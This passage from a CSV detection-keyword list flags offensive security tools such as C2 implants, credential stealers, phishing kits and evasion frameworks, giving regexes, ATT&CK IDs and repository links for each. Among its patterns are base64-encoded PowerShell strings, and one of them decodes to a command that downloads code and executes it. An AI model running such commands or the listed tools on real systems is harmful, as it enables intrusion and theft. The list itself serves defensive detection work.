On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*--just-clean*cleaning/to_clean.txt*",".{0,1000}\-\-just\-clean.{0,1000}cleaning\/to_clean\.txt.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*-just-dc-user not compatible in LOCAL mode*",".{0,1000}\-just\-dc\-user\snot\scompatible\sin\sLOCAL\smode.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*-just-dc-user switch is not supported in VSS mode*",".{0,1000}\-just\-dc\-user\sswitch\sis\snot\ssupported\sin\sVSS\smode.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*jweny/zabbix-saml-bypass-exp*",".{0,1000}jweny\/zabbix\-saml\-bypass\-exp.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - 
TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","1","N/A","N/A","1","95","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" "*jwt_tool*",".{0,1000}jwt_tool.{0,1000}","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","10","4977","632","2024-04-01T11:15:49Z","2017-01-23T21:13:50Z" "*-K lsass_loot*",".{0,1000}\-K\slsass_loot.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-k -no-pass -p '' --auth-method kerberos*",".{0,1000}\-k\s\-no\-pass\s\-p\s\'\'\s\-\-auth\-method\skerberos.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*K1W1F01D3r(*",".{0,1000}K1W1F01D3r\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" 
"*K1W1F113(*",".{0,1000}K1W1F113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*k4yt3x/orbitaldump*",".{0,1000}k4yt3x\/orbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*K8_CS_*.rar*",".{0,1000}K8_CS_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*k8gege.org/*",".{0,1000}k8gege\.org\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*k8gege/Ladon*",".{0,1000}k8gege\/Ladon.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*K8Ladon.sln*",".{0,1000}K8Ladon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" 
"*KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA*",".{0,1000}KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA*",".{0,1000}KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 
- T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*kali-*.deb*",".{0,1000}kali\-.{0,1000}\.deb.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-anonsurf*",".{0,1000}kali\-anonsurf.{0,1000}","offensive_tool_keyword","kali-anonsurf","Anonsurf will anonymize the entire system under TOR using IPTables. It will also allow you to start and stop i2p as well.","T1568 - T1102 - T1055 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Und3rf10w/kali-anonsurf","1","1","N/A","N/A","10","1417","445","2023-12-21T00:42:17Z","2015-08-19T04:57:16Z" "*KaliLadon.*",".{0,1000}KaliLadon\..{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*kali-linux*.7z*",".{0,1000}kali\-linux.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux*.img*",".{0,1000}kali\-linux.{0,1000}\.img.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux*.iso*",".{0,1000}kali\-linux.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*.torrent*",".{0,1000}kali\-linux\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*.vmdk*",".{0,1000}kali\-linux\-.{0,1000}\.vmdk.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*.vmwarevm*",".{0,1000}kali\-linux\-.{0,1000}\.vmwarevm.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*.vmx*",".{0,1000}kali\-linux\-.{0,1000}\.vmx.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-installer-amd64.iso*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-amd64\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-installer-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-live-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-live\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. 
Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-raspberry-pi-armhf.img.xz*",".{0,1000}kali\-linux\-.{0,1000}\-raspberry\-pi\-armhf\.img\.xz.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-virtualbox-amd64.ova*",".{0,1000}kali\-linux\-.{0,1000}\-virtualbox\-amd64\.ova.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kali-linux-*-vmware-amd64.7z*",".{0,1000}kali\-linux\-.{0,1000}\-vmware\-amd64\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kalilinux/kali-rolling*",".{0,1000}kalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*kalilinux/kali-rolling*",".{0,1000}kalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kalitorify*",".{0,1000}kalitorify.{0,1000}","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which uses iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). 
or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","N/A","N/A","10","979","219","2024-04-18T07:11:44Z","2016-02-03T20:42:46Z" "*kaluche/bloodhound-quickwin*",".{0,1000}kaluche\/bloodhound\-quickwin.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful information from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "*kancotdiq/wpaf*",".{0,1000}kancotdiq\/wpaf.{0,1000}","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","67","14","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" "*karendm/ADHunt*",".{0,1000}karendm\/ADHunt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*karing.martin+confusercoc@gmail.com*",".{0,1000}karing\.martin\+confusercoc\@gmail\.com.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*Karkas66/CelestialSpark*",".{0,1000}Karkas66\/CelestialSpark.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging 
Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*Karmaleon.py*",".{0,1000}Karmaleon\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*karmaSMB.py*",".{0,1000}karmaSMB\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*KasRoudra/CamHacker*",".{0,1000}KasRoudra\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*kasroudrard@gmail.com*",".{0,1000}kasroudrard\@gmail\.com.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*katoolin*toollist.py*",".{0,1000}katoolin.{0,1000}toollist\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*katoolin3.py*",".{0,1000}katoolin3\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*KatzSystemArchitecture*",".{0,1000}KatzSystemArchitecture.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*KaynInject.x64.exe*",".{0,1000}KaynInject\.x64\.exe.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - 